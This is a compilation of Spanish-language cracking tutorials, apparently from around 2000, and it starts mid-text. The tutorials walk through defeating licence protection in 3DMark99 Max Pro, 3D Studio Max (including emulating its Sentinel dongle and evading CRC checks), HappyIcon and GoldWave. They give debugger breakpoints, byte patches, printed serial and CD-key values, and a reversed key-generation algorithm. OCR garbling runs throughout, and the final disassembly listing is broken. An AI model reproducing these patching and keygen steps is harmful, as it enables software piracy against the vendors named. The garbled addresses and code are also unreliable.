este afamado programa. 

A continuación unos cuantos enlaces que seguro ayudarán a completar este tutrorial con 
éxito: 


Página oficial del grupo K-FoR: http://pagina.de/kfor 


Página oficial de file insPEctor: http://www.inicia.es/de/viper/finspec.htm 


Mi dirección de E-Mail: viper167ftelepolis.com 


"Carga las pistolas y trae a tus amigos 
Es divertido perder y disimular" 
(Smells like teen spirit - Nevermind - Nirvana) 


sobre 
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3D Mark99 Max Pro 


PROTECCION: 
Descripcion: Utileria Grafica 


Dificultad: Principiante 


DOWNLOAD: http://www.ktx.com 


Herramientas: Softice v3x 


Kamui 02/10/2000 


INTRODUCCION 


Es una utilidad para comprobar cómo nos funcionan las tarjetas gráficas para los juegos. 


AL ATAKE 


1- Al ejecutar el programa vemos que es una versión con límite de tiempo, pero que 
nos da la posibilidad de registrarlo. 


2- Cargado el SI, ejecutamos el programa objetivo, y hacemos un breakpoint: 
bpx getwindowtexta 


Introducimos un nombre y un serial cualquiera. Cuando le damos a registrarnos, 
saltamos en SI otra vez, con F5 y F12 llegamos hasta: 


Traceamos con F10 hasta llegar a la cadena principal. 
3- Podemos ver la siguiente cadena: 
40b87c 7474 3z 0040b8£2 


40b87e 83£f811 cmp EAX,11 => compara n”* de caracteres del serial chungo, serial 
valido 


40b881 741b jz 0040b%e => no salta y nos lleva al error 


40b883 6a00 push 00 


40b897 e85a9d0900 call 004%a55f6 => esta es la llamada al error. 
4- Ahora podemos ver qué ha comparado: 


? EAX => SI nos dice que es el n* de caracteres del serial que nosotros hemos 
introducido. 


? 11 => en decimal es 17, que son los caracteres del codigo real. 


Volvemos a introducir un nombre un codigo de 17 caracteres. Vemos que ahora el 
salto de 40b881 no se produce. 


5- Explorando podemos ver que hay 3 llamadas antes de la llamada al error. Primero 
podemos rastrearlas para ver qué hay: 


5.1- 40b8%e call 00469e30 ---> podemos ver nuestro codigo chungo comparandolo con 
otros seriales, serán una lista de seriales blacklisteados? 


5.2- 40b8af call 00469e80 ---> parece que no hay nada importante. 
5.3- 40b896 call 004572d0 ---> parece que tampoco hay nada importante. 


Deberiamos inspeccionar las llamadas que hay dentro de las llamadas pero tampoco 
hay nada... 


6-Vemos que en la Cadena principal existen comparaciones y saltos condicionales: 
40b8a3 3c01 cmp al,01 


40b8a5 “5dc jnz 0040b883 => no salta, pero si lo cambiamos nos lleva al error. 


Existen más: 
40b8ba 3ad3 cmp dl,b1l 


40b8bc 751le jnz 0040b8dc ---> salto obligado que nos lleva al error (a la cadena 
principal) 


40b8be 84c9 test cl,cl 


40b8c0 7416 3nz 0040b8d8 


Si cambiamos estos dos saltos, nos da el mensaje de gracias por registrarnos, PERO 
como tiene un chequeo previo , al arrancar el programa estamos otra vez sin 
registrar. 


¿Dónde puede estar el salto que nos lleve al éxito ? Pues, estará dentro de una 
llamada que nos envie a otra parte. En la 2* call podemos ver unos saltos que no se 
ejecutan cuando se comparan dos valores: y existe un salto importante: 


40b8ac 887760 mov esi, [edi+60] 


40b8af e8cce50500 call 00469e80 -—-—->entrando debemos pasar un loop que hay (para 
salir más rapidamente g 469f2d ), vemos: 


469f£2b 3beb cmp ebp, ebx 


469f£2d 7432 jz 00469f61 --->NO salta, este salto es importante, al invertirlo 
saltamos a otro sitio que al tracear con F10 vemos que entramos en un loop 
(generando el codigo?), "escapamos" de él con g 469f92. Al salir vemos: 


469f90 72d9 3Jb 00469f6b ---> fin del loop, nos manda al ppio de éste. 
469f92 6a05 push 05 


469f94 8d4c2414 lea ecx, [esp+14] 


469198 


469199 


469f9e 


BUENO; 
serial 


NOTA 1: 


51 push ecx => n” de 15 caracteres ? falta algo 


684ce54d00 push 004de54c ===>SERIAL CORRECTO <=== 
ff£1500184b00 call [004b1800] 


pues nos ha costado mucho trabajo pero al fin hemos conseguido encontrar el 


valido (algo así como XXXXX-XXXXX-XXXXX), pero ha merecido la pena, no? ;-). 


Primero decir que esto es para el estudio de la protección del programa, 


para poder evaluarlo mejor, y que si os gusta,debeis comprarlo! ;-) 


NOTA 2 


Si teneis alguna duda o sugerencia o crítica, no se, lo que querais, 


hacermela saber, porfa... kamui_flatinmail.com. 
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Programa: 3D Studio Max R2.5 y PRAREUEO MAR ADE y VOsL SERSUMAS RGSCRIcS- 1 —-Resumen didáctico 


INTRODUCCION 


Este resumen didáctico, una vez censurado en Febrero por el intolerante BSA, 
decidí correr el riesgo de actualizarlo y publicarlo de nuevo; si, por parte de 
AutoDesk, recibo una petición justificada para "bombardear con plutonio" este 
documento, lo haré desaparecer sin rechistar ( existen varios crakcs para el 3DSMax 
v3.1, es decir que este documento no perjudica a nadie. 

El mejor que he encontrado es el de Harvest, de mi ex-colega en SIEGE Kashmir; el 
peor el de DOD, que mejor olvidar). 

Veremos a partir de esta discusión, en cuanto a la protección de v3.1, que 
AutoDesk ha aprendido realmente mucho desde el triste intento para proteger 

R2.5, sin embargo, lamentablemente, lo que de hecho falla en esta protección 

es la vulnerabilidad intrínseca del propio Centinela, aunque Kinetix pudiera en 
cierto modo asumir parte de culpa ( véase las pruebas del CRC más adelante). 


AL ATAKE 


Empezaremos fijándonos en la protección del InatallShield, un Secuencial + de 
formato 3-8 y una Clave-CD. 


Todos los cuadros de entrada aceptan entradas de extensión fija, si observamos 
el directorio provisional de InstallShield, se muestran unos pocos dll, aunque, 
verdad, únicamente Identify.dll destaca ( InstUtil.dll es como si fuera una 
instalación utilidad dll y a 4,5 K tiene una capacidad demasiado escasa para 
almacenar una protección significativa, Browse.dll y Regplugs.dll también se 
han descartado con facilidad). 
Mirando atentamente entre las exportaciones y descompilando el guión encon- 
traremos que Identify.ValidateKeyWithPrefix() es la función que hay que ana- 
lizar; se puede verificar que modificando un 1 en EAX cuando regresa, permite 
que la instalación prosiga. 


Únicamente le di una lijera ojeada a cómo se ejecuta esta función, es bastante 
simple, con una tabla y algunas operaciones aritméticas básicas y un único XOR 
Lo que es pesado del esquema es lograr entender qué posiciones del Número 

de Serie generan la correspondiente Clave CD (es fácil encontrar la Clave 
correcta si se compara co la compensación 0x2651). 

Más tarde se comprobará que el propio 3DSMax comprueba que los tres 

primeros digitos del Número de Serie son 110, el resto puede completarse 
libremente ( rango 00000000-99999999), con lo que un ejemplo seria el 

Numero de Serie 110-99999999, Clave CD 2 SERVD, la idea es esta, 

aún así, vamos a instalarlo. 


A continuación, cargaremos 3dsmax.exe en IDA ( si realmente de desea guardar 
cierta firma de aplicación de búsqueda FLIRT Centinela de Killer_3K), lo que 

se verá es que la protección se basa en sproFindFirstUnit (), sproRead() y 
sproQuery(), el uso de la consulta es nuevo. 

Lo primero que se debe hacer es modicar sproFindFirstUnit( sub_5D8B61), lo 

que resulta muy fácil y propongo no describirlo. 

Lo siguiente que hay que encontrar es el código de Autorización correcto, tarea 
bastante trivial, 5D2251 comprueba la extensión (8) y 5D2497 realiza la com- 
paración efectiva, en mi ejemplo anterior el código es B63A197B. 


sproRead (_5D8D30 ) tiene dos referencias, Cada vez que se pone a O la 
dirección de lectura (es decir la mochila ID), lo mismo ocurre con R2.5; no 
podría obtenerse esto si se ejecutara con el funcionamiento normal de 3DSMax, 
estoy convencido que se suministra como una interfaz de activadores de 
conexión. 

Por si acaso, si se reescribiera sproRead(), debería colocarse un bpx en 
sproQuery (_5D9120) sin embargo, tomaría un tiempo hacerlo funcionar. 

Dado que no hay forma de saber exactamente qué respuesta de consulta debería 
ser, reescribiremos sproQuery para devolver al menos una cadena que se podrá 


reconocer: 

:005D9142 JZ 005D9144 <--- A nuestra Rutina 

:005D9144 PUSH EBP <---= Guardar EBP 

:005D9145 MOV EAX, [ESP+18]<---—-Colocar un número de bytes 

en la cadena de consulta 

:005D9149 XCHG ECX, EAX <--— en ECX 

:005D914A CALL $+5 ¿====== Set up delta 

:005D914F POP EBP <K===== Delta. 

:005D9150 LEA ESI, [EBP+12] <-—-Iniciar el retorno de consulta 
(máx. 56 bytes). 

:005D9153 MOV EDI, [ESP+20] <-—-Lugar de almacenamiento. 

:005D9157 REPZ MOVSB <---—Move. 

:005D9159 XCHG ECX, EAX <-—-Reiniciar ECX y eliminar EAX. 

:005D915A POP EBP <-- Required: 

db 56 dup (0) <-—-—Respuesta de consulta simulada. 


Tal como verá en SoftICE, únicamente se han verificado 4 bytes de la respuesta 
a la consulta a través de strcmp() en 0046F65A, las cadenas de consulta, no 
obstante, no son las mismas en cada ocasión. 

De hecho, es mucho más complicado puesto que esta área de códigos se 

comprueba a través de CRC desde distintas ubicaciones, a continuación presen- 
taremos una de estas comprobaciones: 


:00431058 MOV ESI, 0046F190 <-—-—Empezamos desde aqui 


:0043105D XOR EAX, EAX <-—-—Eliminar EAX. 

:0043105F CMP ESI, 0046F900 <-—-check till here (comprobacion) 
:0043106A MOV ECX, 0046F190 

:00431071 XOR EDX, EDX <------ Borrar EDX. 

:00431073 MOV DL, [ECX] <----Colocar Byte [ECX]. 

:00431075 INC ECX <--—-—Incrementar ECX. 

:00431076 CMP ECX, <--—Comprobacion 

:0043107€C NOT EDX <--—- EDX is checksum. 

:00431082 JB 00431071 

:00431084 SUB EAX, [006298A4] <--- Deberia ser 0. 


Si se ajustara strcmp() se plantearían problemas en todas las comprobaciones 
CRC y "esto es malo, muy malo" ( Según el estilo de Rainman, si se ha visto 
la película de Dustin Hoffman). 

Tampoco es practico sentanse y esperar, o intentar buscar todas las compro- 
baciones. Por el contrario, modificaremos nuestro codigo de emulación 
sproQuery () para asegurarnos que no vamos a hacer nosotros el trabajo duro. 


:005D9142 JZ 005D9144 <-— Nuestra rutina 
:005D9144 MOV EAX, [ESP+14] <-- Numero de bytes en la 
cadena de consulta 
:005D9148 XCHG ECX, EAX <--—-Place in ECX 
:005D9149 LEA ESL, [ESP+38] <--Get good response address. 
:005D914D MOV EDI, [ESP+1C] <-—-—-Where to place it. 
:005D9151 REPZ MOVSE 
:005D9153 XCHG ECX, EAX <-—-Reiniciar ECX y eliminar EAX. 
Ahora, strcmp() funciona tal como queriamos y no existe la necesidad de 


"ensuciarnos" las manos yendo a la caza y Captura de la rutina de compro- 
bación de la modificación Kinetix. 

De modo que observamos aqui que, aunque Kinetix ha hecho algunas 

mejoras, su protección es 1) aún fácil de aislar, y 2) presenta errores de 
aplicación. 

He oido rumores de que la versión 4 introducirá un conmutador para 

aumentar la protección de gestión de la licencia, ¡vamos a esperar y veremos 
que pasa! En cuanto a Kinetix, no se ve ningún crack por ninguna parte, los 
perdedores que piratean el programa y privan de un soporte merecido no 
dispondrían de pistas de qué hacer con esta información. 


R2.5 - 6 de octubre de 1999 


Bienvenidos a esta mochila didáctica en la cual estoy examinando de nuevo un 
viejo enemigo, un Centinela. 

Se supone que se han descargado los correspondientes archivos para este 
menester o que se tiene acceso a ellos; el primer paso es poner en marcha 
maxauth.exe para que autorize la copia de 3D Stucio Max. 

No me preocupa demasiado cómo se podría resover esta parte: bpx 
GetDlglItemTextA y averiguarlo, modificar retrocediendo al cuadro de mensaje 
( desmontaje ), o simplemente teclear 1039120D (Secuencial $ 661-93842762, 
Clave-CD V13M). 


Al poner en marcha 3DSMax, como era de esperar, se produce un error, sin 
embargo debería encontrarse fácilmente la dirección del incordio con un opor 
tuno bpx MessageBoxA. 00450F21 parece ser la rutina ofensiva, observe la 
instrucción CALL EBP, que, desde luego, s una llamada a [MessageBoxA]. 

Ahora podemos *hacer el intento* de examinar 3dsmax.exe en W32Dasnm, 

no obstante algo ocurre, inténtelo y espere; en lugar de desensamblarse, 
W32Dasm aparece como el activador involuntario de 3DSMax y con la peor 
fortuna se conseguirá un retorno a SofrICE con un error. 


En este punto, disponemos de varias opciones, o entender qué trucos se han 
usado para engañar a W32Dasm o usar IDA que no parece presentar el mismo 
problema. 

Estuve "jugando" con W32Dasm durante un momento con un bpx ReadFile 

en el dialogo de apertura del archivo y seguí laboriosamente a través de la 
asignación de memoria y la apertura del archivo, encontrando la instrucción 
ofensiva en 0045C6D2, desafortunadamente, invirtiendo el flag cero 

todavía ocurría un error en cw3220.d11, que no tenía demasiado interés intentar 
resolver. 


Nos quedamos, pues, con IDA, sin embargo, me temo que desensamblar 
3dsmax.exe lleva un buen rato. 

Entretanto, comenzaremos las pruebas usando SoftICE, una posible línea de 
ataque sería con un bpx CreateFileA, tal como se verá a continuación. 

Se sabe que el programa puede abrir un archivo activador para comunicarse 
con la mochila (en este caso sentinel.vxd) y, puesto que este archivo 

no está instalado en nuestro sistema, la llamada API ciertamente fallará, 
de modo que podemos imponer una condición IF en este punto de interrupcion. 
Vamos a hacer lo siguiente: 


bpx CreaterFileA if EAX=ffffffff <---2 signos iguales 


*Observese que también puede usarse bpio -h 378 rw. 


Con toda seguridad, al cabo de algunos retornos intrascendentes, SoftICE 
se detiene en 


:0055214C PUSH 00552120 
:00552151 CALL KERNEL32!CreateFileA 


Es ahora en este código desde donde podemos iniciar el seguimiento, 
probablemente es más sencillo continuar la exploración con el uso del 
cargador SoftICE y el comando g. 

Huelga decir que el salto condicional después de esta interrupción se tendrá 
que reservar. 

Una vez de vuelta al código, calcularemos cuantas veces podemos pulsar F12 
antes de que se desconecte el cuadro de mensaje, deberían ser unas 6 veces 


o bien la dirección 00450DFD es hasta donde se puede llegar. 


Evidentemente, 00450DFD es un buen punto de entrada, recordando que 

conocemos la dirección del cuadro de mensaje (0045FD21), esto no se 

encuentra demasiado lejos y entretanto un análisis del código no estaría de más. 
Con una simple acción escalonada y tal vez un poco de sensibilidad Zen se 
podría declarar este código sospechoso (esto que se ofrece a continuación se 


ha sacado de IDA). 

:00450E5C MOV EDX, DWORD_561248 

:00450E62 XOR EDX, 73ADh 

:00450E68 PUSH EDX 

:00450E69 LEA EDX, [ESP+678+var_464] 

:00450E70 PUSH EAX 

:00450E71 CALL SUB_552A50 

:00450E76 TEST AX,AX <---AX= 3 aqui i.e. dongle not present. 
:00450E79 JZ loc_45023 


Fijémonos en este código y entendamos porqué esto *debe* ser una 

comprobación, fijémonos también en lo que pasa cuando suspendemos 

el primer JZ, aunque parezca increible, el programa ofrece una repetición 

común y sabida del código anterior, 3DSMax obviamente trata de acceder a 

la mochila 3 veces antes de que se visualice el cuadro de mensaje. 

Podemos, usando nuestra propia guia API Centinela, tratar de asignar a este 
código una función especifica, que a mi se me antoja sproFindFirstUnit() o algo 
parecido, A0A3, pienso que es un diseñador de ID de Kinetix. 

Naturalmente, usaremos este "7242" como cadena de búsqueda para identificar 
otras comprobaciones Centinela. 


Puesto que he visto unos cuantos Centinelas en estos años, esperaría encontrar 
más o menos 15 referencias para "7242" , la proximidad de las direcciones sería 
evidente pueston que estoy convencido que es una biblioteca que usan los 
diseñadores sin reparar en si utilizan todas las funciones. 

Usando IDA se podrá observar que la mayoría de estas funciones nunca se han 
conseguido, esto el lo mejor de IDA hace el seguimiento de todas las rutas de 
ejecución y, a menos que se reciban páginas de error, puede confiarse en gran 
medida en estos resultados. 


Como añadido, existe también una comprobación en util.dll., la cual se propor- 
ciona como una interfaz para usar por los diseñadores de conexión, sin cribar 

se exporta como HardwareLockID, y parece que se comunica con 

sproFindFirstUnit ( CALL 2802BEF0O ) y sproRead() ( CALL 2802C0C0 ). 

Para recuperar el número de serie, será necesario hacer la modificación mientras 


se considere adecuado, al final de esta función EAX deberá retener el número 
de serie de la mochila; lo que sea XOR EAX, EAX no es una mochila. 
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Hacer un Keygen, Simular estar registrados, etc. 


Es un software de 32 bits, para windows 95-98 y 2000, con este puedes crear iconos, 
cursores y cursores con movimiento conviertiendo archivos graficos tanto bmp, jpg, etc. 


Principiante 


www.logipole.com 


Unicamente nuestro querido Softice v 3.xx 


PrOfesOr X FECHA: 02/10/2000 


INTRODUCCION 


Hola a todos, Bueno amigos, regreso con otro tutorial mas, ya ni me acuerdo cuantos llevo pero no 
importa, solo importa compartir los conocimientos ok!!!. 


Este programa la verdad cuando lo vi me dije !! hey parece que tiene una protección buena, vamos a 
bajarlo !! pero vaya sorpresita BUUUUUU !!! VAYA DESCEPCION !!!. 


Pero me decidi escribir este tutorial para que los principiantes se den cuenta que facil es obtener un 
serial en menos de un MINUTO. 


Ya veran por que lo digo....... 


AL ATAKE 


El primer paso es por supuesto instalar el programa, al instalarlo saldra una simpatica ventana como esta : 


5 Happylcon - Install 


Warming 


< Atrás 


Click Next if pou accept these terms. 


THIS SOFTWARE IS 4N EVALUATION VERSION 
THIS PROGRAM WILL STOP FUNTIONING 
AFTER 30 DAYS. 


YOU WILL NEXT HáWE TO REGISTER TO OBTAIN THE 
LAST UNLIMITED VERSION. 


THIS EVALUATION VERSION HAS NO LIMITATIONS 


Cancelar | 


bueno como ven aqui nos damos cuenta de las restricciones que trae esta chucheria, buen demos click en siguiente 
hasta que termine de instalarse, despues vamos y abrimos el programa para echarle un vistazo, 


2% Happylcon (unregistered) E E3 


Happylcon Misc Help 


Look in: Y Happylcon +] | A 


File name: | 
File Type: [av «Windows Audio Video Interleawe +] 
Target folder 


| 
B WProgram Files+Happylcon LJ] | 


J 


dla (1+2*/|?2 3 


TT 16x2 

FT 1616 

TT 16x256 
7 16x24 bits 
T” 16x32 bits 


7 64x2 
TT 64x16 
MT 54x256 
TT 64824 bits 
T”64x32 bits 


— Formats - size x colors — 


1 32x2 
32:16 

T” 324256 
T” 32:24 bits 
T— 32x32 bits 


1 96x2 

TT 96x16 

T 7 96x256 
T” 96x24 bits 
T” 96x32 bits 


1” 48x2 
T— 48x16 
[748x256 

T” 48x24 bits 
T” 48x32 bits 


mm. 

TT x16 

7 x256 
[7 x24 bits 
IT” x32 bits 


Free: 5 | 


First, select the files] to convert, 
next choose the format(s] to 
include in the icon and finally 
click on this huge button --> 


€ do 


FT Transparent background - 0| 


Create from scanner 


Create as: 
Icon 


como podemos ver en la parte superior aparece un string que dice ( UNREGISTERED ) mmmmm.... 


ahora hechemosle un vistazo en el menu de help y ahi encontramos una opcion que dice register damos click en ella y 
nos manda a una ventana en la cual podemos insertar un nombre y numero de serie, bueno pues manos a la obra, ya 
sabemos por donde atacar, ahora reinicien la PCera e inicien con el Softlce, una vez iniciado ejecuten el programa e 
inserta un nombre y numero de serie, que en mi caso puse: 


Register 


PA 


+una vez insertado demos click en OK yyyyyyyyyy!!!! 
R e gis ter 


XK 


insertemos nuestro nombre y serial pero antes ahora demos control D y saltaremos al SoftICE eh insertemos un Break 
Point BPPX MESSAGEBOXA y demos otra vez Control D y ahora si demos click en OK !! y saltamos al Softice, 
ahora demos Fl 1 una sola vez y nos aparece la ventana de 


tegister 


XK 


damos click en ACEPTAR y saltamos de nuevo al Softice en : 

414127 call [user32!'messageboxa] 

41412d push 01 

41412f push ebp 

ahora sube unas cuantas lineas hasta donde encuentres algo como esto : 

414116 cmp e€ax,ecX <oooommmo==- lugar donde se comprueba nuestro serial con el correcto 


414118 jz 00414148 <ocomomoo-- salta si no es igual 


bueno creo que ya dimos con la instruccion que compara nuestro serial, pero para ver el serial correcto tenemos que 
poner un break point en 414116 para eso tenemos que borrar todos los breakpoints puestos y despues ponemos en el 
Softice: 


be* 
y despues 
bpx 414116 


una vez hecho esto, nos vamos e insertamos otra vez un serial y un nombre y damos ok yyyyyyyyy saltamos 
directamente a la Dirección de memoria 414116 una vez ahi vemos el contenido de EAX y ECX con la instruccion 
?EAX y ?ECX nos mostrara lo siguiente : 


069%f6bc7 0123456789 <---- nuestro numero introducido 


DB97424 3684123202 <oomomom NUESTRO SERIAL CORRECTO !!!n 


espero que les guste, alguna duda o sugerencia favor de escribirme a mi email. 


NOTA: por cierto un saludo a el grupo Kfor y a txeli, y recuerda si quieres que tus tutoriales aparescan en la 
"COMPILACION DE TUTORIALES 2000" favor de enviarmelos a mi email 


profesor_xG hotmail.com 
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Editor Hexa, Wdasm y Softice 


KuaTo_ThoR 02/10/2000 


INTRODUCCION 


Muy buenas a todos una vez más. A pesar de que he puesto como herramientas Wdasm y el editor hexa, 
realmente no nos son indispensables, la verdad es que el Wdasm lo he usado porque cuando instalé el 
programa, no tenía ejecutado softice, así que eché un vistazo con Wdasm y me di cuenta de la ridícula 
protección, si es que se pude llamar así. 


Lo primero que vamos a hacer es localizar la zona calinte, luego veremos como encontrar el serial válido, 
luego como hacer que el programa nos dé el serial válido, y finalmente analizaremos el código para crear un 


Keygen. 


AL ATAKE 


Preliminares. Obtener información. 


Bueno este trabajo va a ser corto, nada más iniciar el programa, nos aparece la ventana de ayuda, y en la primera línea nos 
dice que es totalmente funcional durante 30 días. 


Buscamos algún lugar donde se pueda meter un código, en Help nada, en Window nada, ahí está, en Options, Register, 
metemos cualquier cosa y nos aparece un bonito mensaje, ''Invalid registration. Please...”, lo anotamos por ahí y 
continuamos la marcha. 


El ejecutable, GoldWave.exe, ya os digo que no está comprimido, si queréis podéis comprobarlo con File Analizer, con 
Getyp o con cualquier otro. 


A por él. 


Como ya os he dicho no tenía ejecutado softice, y por no reiniciar, que con gitindUs nunca se sabe que esperar, 


ES 
A . Jen R 
desensamblamos con Wdasm, y buscamos nuestra frasecita, ya sea en las String References o directamente en Buscar 


Texto ¡91 Conviene pulsar una par de veces para saber en cuantas ocasiones aparece la frase, esta vez solamente en una. Y 
nos aparece tal que aquí: 


:00460CDC 5F pop edi 

:00460CDD 5E pop esi 

:00460CDE 50 push eax <-- ¿Será uno de estos es nuestro código Gieno? 
:00460CDF E834F8FFFF call 00460518 <-- Compara códigos Gieno y Malo 
:00460CE4 59 pop ecx 

:00460CE5 84C0 test al, al 

:00460CE7 0F8597000000 jne 00460D84 <-- Saltamos a chico Gieno si al<>0 


* Possible StringData Ref from Data Obj ->"Register" 
| 

:00460CED 8B15BCEA4E00 mov edx, dword ptr [O004EEABC] 
:00460CF3 8B4E43 mov ecx, dword ptr [esi+43] 
:00460CF6 8B01 mov eax, dword ptr [ecx] 

:00460CF8 6A30 push 00000030 

:00460CFA 52 push edx 


* Possible StringData Ref from Data ObJ] ->"Invalid registration. Please " 
->"be sure to enter your name and " 
-=>"password exactly as given in the " 
-=>"license." 


:00460CFB 6841EF4E00 push 004EEF41 <-- OFFSET 602FB, pillad esto pa'luego. 


Creo que más claro no puede estar, bueno sí, si nos pusiesen directamente el password ;-). La única duda es si antes del call 
tendremos nuestro código gieno, o lo calculará dentro. 


Efectivamente, si realizamos el salto a 00460D84, estaremos en la zona de registrado, si vamos alli con Go to Code Location 


63 
e veremos que aparecen cosas como las siguientes: 


Possible StringData Ref from Data Ob] ->"goldwave.ini" <--— Archivo sospechoso 
Possible StringData Ref from Data Obj ->"Register" 

Possible StringData Ref from Data Obj ->"First" <-- Nombre 

Possible StringData Ref from Data Ob] ->"Last"  <-—- Apellido 


XA AX x 


* Possible StringData Ref from Data Obj ->"Password"  <-- Pues eso 


Si el programa tuviese alguna complicaión especial, ya sabríamos algo interesante, donde guarda los datos de registro, 
aunque en esta ocasión sólo nos servirá para saber como desregistrarnos, borrando el password. 


Creo que está claro lo que hay que parchear ¿¿no??, nos situamos sobre 00460D84, y miramos el offset, que es 602E7. 
Vamos al editor hexa, y cambiamos el 85 por un 84. Guardamos los cambios, volvemos a ejecutar el programa, metemos los 
datos que nos de la gana, y ya está registrados, volvemos a iniciar el programa, y no seguimos registrados, al menos hay 
hecho algo bien en la protección, vuelve a comprobar el password en otro sitio, podríamos buscarlo, pero no me quiero 
enrollar más con esto, podéis hacerlo como ejercicio, vamos a por el serial. 


A por el Código Giieno 


Para esto no queda más que cargar softice (aunque podríamos hacerlo con TRW), así pués reiniciamos nuestra máquina.( y 
rezamos para que no nos joda el win ;-)) 


Cargamos nuestro ejecutable con el Symbol Loader, os recuerdo que es GoldWave.exe, y ponemos un break en el punto 
00460CDE, es decir bpx 460cde, que es donde creemos que está nuestro código y si no está, nos meteremos dentro del call a 
buscarle. 


Lo dicho, ejecutamos, metemos los datos de registro que más nos gusten , por ejemplo de password podemos poner 
147258369, damos a OK, y salta Sice justo donde queríamos, miramos los registros, con el comando d, y si queréis con ?, 
pero lo único que vemos son los datos que hemos metido nosotros, así que tendremos que meternos en el Call. Una vez sobre 
la instrucción pulsamos F8, para entrar en la llamada. Vamos pulsando F10 pero con cuidado cada vez que nos acerquemos a 
una llamada, comprobando los registros al entrar y al salir. Por cierto, si en la ventana de Sice no os aparecen todos los 
registros, eax, edx, ecx, ebx, etc... pulsad F2 y aparecerán. Además si os funciona el ratón, si pulsáis con el botón derecho 
sobre ellos, y pulsáis a Display, obtendréis lo mismo que si utilizaséis el comando d . Por donde iba,....., por F10, pasamos 
algún Call hasta llegar a : 


:0046054A 5E pop esi 

:0046054B 53 push ebx 

:0046054C E8CIFEFFFF call 00460418 <-- Aquí está el código Gieno 
:00460551 59 pop ecx 

:00460552 85C0 test eax, eax 

:00460554 7504 jne 0046055A 

:00460556 33C0 xor eax, eax 

:00460558 EB27 jmp 00460581 


Si miramos los registros al salir del Call, por ejemplo d edx, veremos que donde antes estaba nuestro código chungo, ahora 
hay una serie de letras bastante sospechosa, apuntadla no vaya a ser nuestro password correcto ;-). 


Si lo probamos con el nombre y apellidos de antes, veremos que ya somos usuarios registrados, además podemos ver nuestro 
código en goldwave.ini. 


Un Jueguecito más 


Vamos a ver como hacer que el propio programa nos de el código correcto para la combinación Nombre-Apellido que 
metamos. 


Si os fijáis arriba donde aparece el mensaje de"Fallaste" es en la siguiente instrucción: 
:00460CFB 6841EF4E00 push 004EEF41 
Con el Push, mandamos la frasecilla de "Fallaste" a la pila, pero, ¿y si mandásemos el código correcto? 


Unicamente tenemos que localizar la dirección donde mete nuestro código, y cambiar esta instrucción por push dirección- 


código. ¿Cómo encontramos la dirección? Para eso tenemos softice, si todavía tenéis el break en 0046054C, sólo hay que ir 
allí, y en lugar de d edx, metemos ?edx, y nos aparecerá justo debajo de donde lo hemos escrito algo parecido a esto: 


0078EF12 XXXXXXXXX  'o)pÚ' 


Ésta es exactamente la dirección de nuestro código, sólo tenemos que cambiar push 4EEF41 por push 78EF12. En este caso 
push 78EF12 es en bytes 6812EF78. Teniendo en cuenta que el offset es 602FB, ya sólo queda hacer los cambios en el 
editor hexa. Si lo hacéis y probáis a meter unos datos cualquiera veréis que en lugar del mensaje de error aparece el código 
correcto. Uffff ! 


Generador de Claves 
Ahora vamos a por lo bueno. 


Como ya sabemos de donde sale el código gijeno, no tenemos más que ir allí, y ver que pasa. Únicamente voy a poner las 
zonas donde calcula algo de nuestro código, por motivos de espacio, pero primero voy a intentar explicar que es lo que va a 
hacer el programa. Lo primero que hace es calcular a partir del nombre un número (A), a continuación hace lo mismo con el 
apellido (B), estos dos números los almacena, y luego suma el tamaño de nuestro nombre con el de nuestro apellido, y a 
partir de ese número genera otro a base de sumas y productos, a este número le suma A y obtenemos (C), y con las mismas 
operaciones de antes ahora sobre C obtiene otro número, al que para terminar suma B, obteniendo finalmente (D). Con este 
número, y realizando una serie de divisiones, iremos obteniendo las caracteres de nuestro password. Vamos a verlo, espero 
expliacarlo más o menos bien: 


Cálculo de A: (número obtenido a partir del nombre) 
Llegamos a inicio con eax = n. donde 'n' es la longitud de nuestro nombre. Además edx apunta a nuestro nombre. ebx = 0 
:00460444 OFBEOA movsx ecx, byte ptr [edx] <-- Pasamos a ecx una letra del nombre. 


Empezando por la última letra. 
:00460447 03C8 add ecx, eax <-- ecx=ecx+eax 
:00460449 03D9 add ebx, ecx <-- ebx=ebx+ecx. Ebx es nuestro acumulador. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

| :00460442 (U) 

| 

:0046044B 4A dec edx <-- INICIO. Venimos de 460442. edx=edx-1 

:0046044C 8BC8 mov ecx, eax <-- ecx=eax. Ecx tiene ahora la longitud del nombre. 
:0046044E 83C0FF add eax, FEFEFFFF <-- eax=eax-01 

:00460451 85C9 test ecx, ecx 

:00460453 75EF jne 00460444 <-- Si ecx<>0 saltamos arriba. (si quedan letras) 


Cuando salgamos del bucle, tendremos en ebx el número que nos interesa. 
Cálculo de B: (número obtenido a partir del apellido) 


Llegamos a inicio con eax = n donde 'n' es la longitud de nuestro apellido. Además edx apunta a nuestro apellido. ebx = A. Es 
exactamente igual que antes, pero en lugar de ir acumulando el número en ebx lo hace en esi. Aquí tenéis el código: 


:00460476 OFBEOA movsx ecx, byte ptr [edx] <-- Pasamos a ecx una letra del apell. 


Empezando por la última letra. 
:00460479 03C8 add ecx, eax <-- ecx=ecx+eax 
:0046047B 03F1 add esi, ecx <-- esi=esitecx. Esi es nuestro acumulador. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :00460474 (U) 


:0046047D 
:0046047E 
:00460480 
:00460483 
:00460485 


Ahora el número estará en esi. 


4A dec edx <-- INICIO. Venimos de 460442. 
eax <-- ecx=eax. 
FEFFFFFF <-- eax=eax-01 


8BC8 mov ecx, 


83C0FF add 


85C9 test ecx, 
75EF jne 00460476 <-- Si ecx<>0 saltamos arriba. 


Cálculo de C y finalmente D: 


:0046049F 
:004604A1 
:004604A2 
:004604A4 
:004604A6 
:004604A9 
:004604AC 
:004604AF 
:004604B2 
:004604B5 


:004604B8 
:004604BA 


:004604BD 
:004604BF 
:004604C2 
:004604C5 
:004604C8 
:004604CB 
:004604CE 
:004604D0 
:004604D2 


:004604D6 
:004604D8 


03F8 add edi, 


59 pop ecx 


8BC7 mov eax, 
8BDO mov edx, 


8B4508 mov 
C1E204 shl 
8D1452 lea 
8D1492 lea 
8D1492 lea 
8D1492 lea 


0O3DA add ebx, 


8B55FC mov 


8BCB mov ecx, 


C1E104 shl 
8D0C49 lea 
8D0C89 lea 
8D0C89 lea 
8D0C89 lea 


03F1 add esi, 
8BDE mov ebx, 


8D741032 


lea esi, 


eax, 
ecx 


eax <- 


eax, dwor 
edx, 
edx, 
edx, 
edx, 


edx, 


dwor 
dwor 
dwor 
dwor 


edx, dwor 


ecx, 
ecx, 
ecx, 
ecx, 
ecx, 


dwor 
dwor 
dwor 
dwor 
